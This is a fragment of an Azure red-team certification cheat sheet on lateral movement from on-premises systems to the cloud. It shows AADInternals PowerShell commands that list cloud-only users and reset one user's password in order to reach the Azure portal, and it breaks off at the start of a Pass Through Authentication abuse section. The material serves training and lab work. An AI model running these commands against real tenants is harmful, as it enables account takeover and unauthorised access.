0xJs/CARTP-cheatsheet/Cloud-OnPrem-lateral-movement.md

 Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID
 Set-AADIntUserPassword -CloudAnchor "User_10caa362-7d18-48c9-a45b-9c3a78f3a96b" -Password "SuperSecretpass#12321" -Verbose
 ```

+- Access Azure portal using the new password.

 ## Pass Through Authentication (PTA) Abuse
 - Once we have admin access to an Azure AD connect server running PTA agent.